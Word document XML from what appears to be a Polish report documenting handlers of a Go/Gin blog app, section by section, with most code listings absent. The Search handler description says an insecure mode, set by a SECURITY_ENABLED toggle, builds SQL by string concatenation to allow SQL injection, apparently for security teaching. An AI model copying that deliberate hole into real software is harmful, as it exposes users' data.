        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*gin.Context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57" w:name="sec57"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.23. *Handler.requireLoginJSON</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57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internal/handlers/handlers.go:135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requireLoginJSON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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2033" w:name="lst33"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 33. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="203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c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*gin.Context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58" w:name="sec58"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.24. *Handler.requireLoginUI</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58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internal/handlers/handlers.go:144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requireLoginUI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fallback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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2034" w:name="lst34"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 34. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="203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c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*gin.Context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fallback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59" w:name="sec59"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.25. *Handler.GetPosts</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59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internal/handlers/handlers.go:157</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GetPosts returns all published blog posts as JSON.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GetPosts returns all published blog posts as JSON.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GetPosts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35" w:name="lst35"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 35. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="203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60" w:name="sec60"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.26. *Handler.PostLogin</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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internal/handlers/handlers.go:170</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PostLogin accepts JSON with username and password. Honours the SECURITY_ENABLED toggle.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PostLogin accepts JSON with username and password. Honours the SECURITY_ENABLED toggle.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PostLogin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36" w:name="lst36"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 36. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="203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61" w:name="sec61"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.27. *Handler.PostRegister</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61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internal/handlers/handlers.go:192</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> handler HTTP obsługujący żądanie POST lub operację modyfikującą stan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PostRegister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37" w:name="lst37"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 37. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="203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62" w:name="sec62"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.28. *Handler.PostCreate</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62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internal/handlers/handlers.go:218</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> handler HTTP obsługujący żądanie POST lub operację modyfikującą stan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PostCreate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38" w:name="lst38"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 38. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="203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63" w:name="sec63"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.29. *Handler.PostUpdate</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63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internal/handlers/handlers.go:254</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> handler HTTP obsługujący żądanie POST lub operację modyfikującą stan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PostUpdate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39" w:name="lst39"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 39. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="203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64" w:name="sec64"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.30. *Handler.PostDelete</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64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internal/handlers/handlers.go:290</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> handler HTTP obsługujący żądanie POST lub operację modyfikującą stan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PostDelete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40" w:name="lst40"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 40. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="204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65" w:name="sec65"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.31. *Handler.PagePosts</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65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internal/handlers/handlers.go:329</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> handler HTTP renderujący stronę UI albo fragment widoku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PagePosts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41" w:name="lst41"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 41. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="204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66" w:name="sec66"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.32. *Handler.PageLogin</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66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internal/handlers/handlers.go:345</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> handler HTTP renderujący stronę UI albo fragment widoku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PageLogin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42" w:name="lst42"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 42. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="204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67" w:name="sec67"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.33. *Handler.PageRegister</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67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internal/handlers/handlers.go:353</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> handler HTTP renderujący stronę UI albo fragment widoku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PageRegister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43" w:name="lst43"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 43. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="204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68" w:name="sec68"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.34. *Handler.PageRegisterSubmit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68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internal/handlers/handlers.go:363</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> handler HTTP renderujący stronę UI albo fragment widoku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PageRegisterSubmit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44" w:name="lst44"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 44. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="204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69" w:name="sec69"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.35. *Handler.PageRegisterPartial</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69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internal/handlers/handlers.go:386</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PageRegisterPartial is the HTMX endpoint for in-place registration. On success it instructs the browser (via HX-Redirect) to navigate to /ui/login, so the message banner is shown there and the user can log in immediately.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PageRegisterPartial is the HTMX endpoint for in-place registration.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On success it instructs the browser (via HX-Redirect) to navigate to /ui/login,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so the message banner is shown there and the user can log in immediately.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PageRegisterPartial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45" w:name="lst45"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 45. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="204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70" w:name="sec70"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.36. *Handler.PagePostsPartial</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7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internal/handlers/handlers.go:411</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> handler HTTP renderujący stronę UI albo fragment widoku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PagePostsPartial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46" w:name="lst46"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 46. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="204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71" w:name="sec71"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.37. readPublishedFromForm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71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internal/handlers/handlers.go:425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readPublishedFromForm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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2047" w:name="lst47"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 47. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="204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c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*gin.Context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72" w:name="sec72"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.38. *Handler.saveUploadedAttachment</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72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internal/handlers/handlers.go:436</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> saveUploadedAttachment stores an uploaded file under uploadsDir and returns its public path and original filename. Returns ("", "", nil) when no file was provided.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saveUploadedAttachment stores an uploaded file under uploadsDir and returns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its public path and original filename. Returns ("", "", nil) when no file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was provided.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saveUploadedAttachment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formField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publicPath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originalName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err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48" w:name="lst48"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 48. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="204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c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*gin.Context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formField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publicPath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originalName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err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73" w:name="sec73"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.39. sanitizeFilename</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73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internal/handlers/handlers.go:463</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sanitizeFilename strips path separators and disallows traversal sequences. Returns "" for invalid names.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sanitizeFilename strips path separators and disallows traversal sequences.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Returns "" for invalid names.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sanitizeFilename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049" w:name="lst49"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 49. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="204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74" w:name="sec74"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.40. *Handler.PagePostsCreate</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74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internal/handlers/handlers.go:474</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> handler HTTP renderujący stronę UI albo fragment widoku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PagePostsCreate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50" w:name="lst50"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 50. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="205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75" w:name="sec75"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.41. *Handler.PagePostsCreatePartial</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75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internal/handlers/handlers.go:511</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PagePostsCreatePartial handles HTMX form submissions and returns the freshly rendered posts list so the page updates without a full reload.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PagePostsCreatePartial handles HTMX form submissions and returns the freshly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rendered posts list so the page updates without a full reload.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PagePostsCreatePartial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51" w:name="lst51"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 51. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="205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76" w:name="sec76"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.42. *Handler.PagePostEdit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76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internal/handlers/handlers.go:553</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> handler HTTP renderujący stronę UI albo fragment widoku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PagePostEdit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52" w:name="lst52"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 52. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="205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77" w:name="sec77"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.43. *Handler.PagePostEditSubmit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77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internal/handlers/handlers.go:583</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> handler HTTP renderujący stronę UI albo fragment widoku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PagePostEditSubmit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53" w:name="lst53"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 53. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="205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78" w:name="sec78"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.44. *Handler.PagePostDelete</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78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internal/handlers/handlers.go:619</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> handler HTTP renderujący stronę UI albo fragment widoku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PagePostDelete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54" w:name="lst54"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 54. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="205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79" w:name="sec79"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.45. *Handler.evaluateLogin</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79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internal/handlers/handlers.go:658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evaluateLogin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message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isError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status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55" w:name="lst55"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 55. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="205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password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message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isError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status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80" w:name="sec80"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.46. *Handler.Logout</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8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internal/handlers/handlers.go:695</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Logout clears the auth cookie and redirects to posts UI.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Logout clears the auth cookie and redirects to posts UI.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Logout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56" w:name="lst56"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 56. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="205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81" w:name="sec81"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.47. *Handler.canDeletePost</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81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internal/handlers/handlers.go:702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canDeletePost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postID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57" w:name="lst57"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 57. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="205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postID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82" w:name="sec82"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.48. *Handler.PageLoginSubmit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82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internal/handlers/handlers.go:722</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> handler HTTP renderujący stronę UI albo fragment widoku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PageLoginSubmit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58" w:name="lst58"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 58. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="205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83" w:name="sec83"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.49. *Handler.PageLoginPartial</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83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internal/handlers/handlers.go:739</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PageLoginPartial is the HTMX endpoint. On success we send HX-Redirect so the whole layout refreshes (showing the green username badge in the navbar).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PageLoginPartial is the HTMX endpoint. On success we send HX-Redirect so the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whole layout refreshes (showing the green username badge in the navbar).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PageLoginPartial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59" w:name="lst59"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 59. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="205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84" w:name="sec84"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.50. *Handler.Search</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84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internal/handlers/handlers.go:765</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Search runs a blog search through the SECURITY_ENABLED toggle:   - secure mode → parameterized LIKE (input cannot break out)   - insecure mode → direct string concatenation (SQL Injection)  Returns posts as JSON.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Search runs a blog search through the SECURITY_ENABLED toggle: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- secure mode → parameterized LIKE (input cannot break out)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- insecure mode → direct string concatenation (SQL Injection)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Returns posts as JSON.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Search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60" w:name="lst60"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
